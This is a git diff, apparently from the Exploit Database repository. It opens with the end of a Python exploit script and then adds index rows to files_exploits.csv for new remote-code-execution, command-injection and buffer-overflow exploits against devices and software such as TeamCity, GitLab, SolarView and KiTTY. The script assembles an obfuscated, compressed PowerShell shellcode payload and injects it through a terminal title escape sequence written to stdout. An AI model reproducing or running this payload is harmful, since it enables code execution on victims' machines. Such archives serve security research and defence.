+shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
+shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
+shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+'
+shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+'
+shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY'
+shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2'
+shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
+shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
+shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc'
+shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
+shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
+shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f'
+shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr'
+shellcode += b'ess))).ReadToEnd()))\"'
+
+escape_sequence = b'\033]0;__rv:'
+escape_sequence += b'" & '
+escape_sequence += shellcode
+escape_sequence += b' #\007'
+
+stdout = os.fdopen(sys.stdout.fileno(), 'wb')
+stdout.write(escape_sequence)
+stdout.flush()

files_exploits.csv

@@ -3644,6 +3644,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10451,exploits/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",remote,hardware,,2009-12-13,,1,CVE-2009-4462;OSVDB-63325;OSVDB-61018,,,,,
 45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,,2018-07-18,2018-07-18,0,,,,,,
 36429,exploits/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI Cross-Site Scripting",2011-12-08,"Silent Dream",remote,hardware,,2011-12-08,2015-03-19,1,CVE-2011-4836;OSVDB-77588,,,,,https://www.securityfocus.com/bid/50978/info
+51885,exploits/hardware/remote/51885.py,"Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)",2024-03-14,ByteHunter,remote,hardware,,2024-03-14,2024-03-14,0,CVE-2023-3710,,,,,
 46143,exploits/hardware/remote/46143.rb,"Hootoo HT-05 - Remote Code Execution (Metasploit)",2019-01-14,"Andrei Manole",remote,hardware,,2019-01-14,2019-01-18,0,,"Metasploit Framework (MSF)",,,,
 21285,exploits/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",remote,hardware,,2002-02-08,2012-09-12,1,CVE-2002-0250;OSVDB-5339,,,,,https://www.securityfocus.com/bid/4062/info
 21827,exploits/hardware/remote/21827.txt,"HP Compaq Insight Manager - Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",remote,hardware,,2002-09-23,2012-10-09,1,CVE-2002-2422;OSVDB-59171,,,,,https://www.securityfocus.com/bid/5780/info
@@ -3880,6 +3881,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,remote,hardware,,2012-04-24,2012-04-24,0,CVE-2012-2441;OSVDB-81406;CVE-2012-1803,,,,,
 51727,exploits/hardware/remote/51727.txt,"Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)",2023-10-09,"Riyan Firmansyah of Seclab",remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
 50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",2022-05-11,"Minh Khoa",remote,hardware,,2022-05-11,2022-05-11,0,CVE-2021-43164,,,,,
+51888,exploits/hardware/remote/51888.py,"Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)",2024-03-14,ByteHunter,remote,hardware,,2024-03-14,2024-03-14,0,,,,,,
 35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",remote,hardware,,2011-05-25,2015-01-16,1,,,,,,https://www.securityfocus.com/bid/47976/info
 35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware,,2011-07-27,2015-02-06,1,,,,,,https://www.securityfocus.com/bid/48908/info
 6532,exploits/hardware/remote/6532.py,"Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery",2008-09-22,Zigma,remote,hardware,,2008-09-21,,1,OSVDB-48555,,,,,
@@ -3921,6 +3923,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21268,exploits/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities",2012-09-12,"Mattijs van Ommeren",remote,hardware,,2012-09-12,2016-12-04,0,OSVDB-85599;OSVDB-85598,,,,http://www.exploit-db.comSitecomNas.2.4.17.bin,http://www.alcyon.nl/advisories/aa-007
 51031,exploits/hardware/remote/51031.py,"SmartRG Router SR510n 2.6.13 - Remote Code Execution",2022-11-11,"Yerodin Richards",remote,hardware,,2022-11-11,2022-11-21,0,CVE-2022-37661,,,,,
 50940,exploits/hardware/remote/50940.txt,"SolarView Compact 6.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2022-29303,,,,,
+51886,exploits/hardware/remote/51886.py,"SolarView Compact 6.00 - Command Injection",2024-03-14,ByteHunter,remote,hardware,,2024-03-14,2024-03-14,0,CVE-2023-23333,,,,,
 50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",2022-06-03,"Ahmed Alroky",remote,hardware,,2022-06-03,2022-06-03,0,CVE-2022-29298,,,,,
 36205,exploits/hardware/remote/36205.txt,"SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking",2011-10-04,"Hugo Vazquez",remote,hardware,,2011-10-04,2019-03-28,1,OSVDB-76147,,,,,https://www.securityfocus.com/bid/49930/info
 32552,exploits/hardware/remote/32552.txt,"SonicWALL - Content Filtering Blocked Site Error Page Cross-Site Scripting",2008-10-30,pagvac,remote,hardware,,2008-10-30,2014-03-27,1,CVE-2008-4918;OSVDB-49459,,,,,https://www.securityfocus.com/bid/31998/info
@@ -3985,6 +3988,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23735,exploits/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - (Authenticated) Remote Command Execution",2012-12-29,xistence,remote,hardware,,2012-12-29,2016-12-04,0,OSVDB-88824,,,,,
 50894,exploits/hardware/remote/50894.py,"USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor",2022-05-11,LiquidWorm,remote,hardware,,2022-05-11,2022-05-11,0,,,,,,
 50875,exploits/hardware/remote/50875.txt,"Verizon 4G LTE Network Extender - Weak Credentials Algorithm",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
+51887,exploits/hardware/remote/51887.py,"Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)",2024-03-14,ByteHunter,remote,hardware,,2024-03-14,2024-03-14,0,CVE-2023-5702;CVE-2023-5222,,,,,
 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",2022-02-28,"Momen Eldawakhly",remote,hardware,,2022-02-28,2022-03-10,0,,,,,,
 29273,exploits/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,remote,hardware,8080,2013-10-29,2013-10-29,0,CVE-2013-6021;OSVDB-98752,,,,,
 43435,exploits/hardware/remote/43435.txt,"WDMyCloud < 2.30.165 - Multiple Vulnerabilities",2018-01-03,"GulfTech Security",remote,hardware,,2018-01-05,2018-01-05,0,GTSA-00125,,,,,http://gulftech.org/advisories/WDMyCloud%20Multiple%20Vulnerabilities/125
@@ -5396,6 +5400,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42702,exploits/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java,,2017-09-13,2017-09-13,0,CVE-2013-6810,"Metasploit Framework (MSF)",,,,
 42701,exploits/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java,,2017-09-13,2017-09-13,0,CVE-2013-6810,"Metasploit Framework (MSF)",,,,
 39007,exploits/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy & Natalie Silvanovich",remote,java,,2015-12-16,2015-12-16,1,OSVDB-131841,,,,,https://code.google.com/p/google-security-research/issues/detail?id=666
+51889,exploits/java/remote/51889.txt,"GitLab CE/EE < 16.7.2 - Password Reset",2024-03-14,0xB455,remote,java,,2024-03-14,2024-03-14,0,CVE-2023-7028,,,,,
 33891,exploits/java/remote/33891.rb,"HP AutoPass License Server - Arbitrary File Upload (Metasploit)",2014-06-27,Metasploit,remote,java,5814,2014-06-27,2014-06-27,1,CVE-2013-6221;OSVDB-107943,"Metasploit Framework (MSF)",,,,
 42756,exploits/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",remote,java,,2017-09-19,2017-09-19,0,CVE-2016-4372,,,,,
 20865,exploits/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution (Metasploit)",2012-08-27,Metasploit,remote,java,,2012-08-27,2012-08-27,1,CVE-2012-4681;OSVDB-84980;CVE-2012-3539;CVE-2012-0547;OSVDB-84867,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-27-at-60732-pm.png,,
@@ -5409,6 +5414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42394,exploits/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",remote,java,,2017-07-31,2018-09-11,1,CVE-2016-0792,,,http://www.exploit-db.com/screenshots/idlt42500/42394.png,,
 38983,exploits/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,remote,java,8080,2015-12-15,2015-12-15,1,CVE-2015-8103;OSVDB-130184,"Metasploit Framework (MSF)",,,,https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11
 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,,2020-01-08,2020-04-13,1,CVE-2019-15039,,,,,
+51884,exploits/java/remote/51884.py,"JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)",2024-03-14,ByteHunter,remote,java,,2024-03-14,2024-03-14,0,CVE-2023-42793,,,,,
 35776,exploits/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload (Metasploit)",2015-01-13,Metasploit,remote,java,9788,2015-01-13,2015-01-13,1,CVE-2014-8741;OSVDB-115622,"Metasploit Framework (MSF)",,,,
 48332,exploits/java/remote/48332.msf,"Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)",2020-04-16,Metasploit,remote,java,,2020-04-16,2020-04-16,1,CVE-2020-7961,,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/liferay_java_unmarshalling.rb
 45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181,2018-07-13,2018-07-13,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/904de2dd0923e7aefe7bbee054ca5ed1947d9995/modules/exploits/windows/http/manageengine_adshacluster_rce.rb
@@ -40497,6 +40503,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50975,exploits/windows/local/50975.txt,"Kite 1.2021.610.0 - Unquoted Service Path",2022-07-21,"Ghaleb Al-otaibi",local,windows,,2022-07-21,2022-07-21,0,,,,,,
 49047,exploits/windows/local/49047.txt,"KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path",2020-11-16,"IRVIN GIL",local,windows,,2020-11-16,2020-11-16,0,,,,,,
 48625,exploits/windows/local/48625.txt,"KiteService 1.2020.618.0 - Unquoted Service Path",2020-06-26,"Marcos Antonio León",local,windows,,2020-06-26,2020-06-26,0,,,,,,
+51890,exploits/windows/local/51890.py,"KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow",2024-03-14,DEFCESCO,local,windows,,2024-03-14,2024-03-14,0,CVE-2024-25003,,,,,
+51891,exploits/windows/local/51891.py,"KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow",2024-03-14,DEFCESCO,local,windows,,2024-03-14,2024-03-14,0,CVE-2024-25004,,,,,
+51892,exploits/windows/local/51892.py,"KiTTY 0.76.1.13 - Command Injection",2024-03-14,DEFCESCO,local,windows,,2024-03-14,2024-03-14,0,CVE-2024-23749,,,,,
 39121,exploits/windows/local/39121.py,"KiTTY Portable 0.65.0.2p (Windows 7) - Local kitty.ini Overflow (Wow64 Egghunter)",2015-12-29,"Guillaume Kaddouch",local,windows,,2016-01-02,2016-01-02,1,,,,,http://www.exploit-db.comKiTTYPortable_0.65.0.2_English.paf.exe,
 39122,exploits/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1/10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",local,windows,,2016-01-02,2016-01-02,1,,,,,http://www.exploit-db.comKiTTYPortable_0.65.0.2_English.paf.exe,
 39120,exploits/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP / Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",local,windows,,2016-01-02,2016-01-02,0,,,,,http://www.exploit-db.comKiTTYPortable_0.65.1.1_English.paf.exe,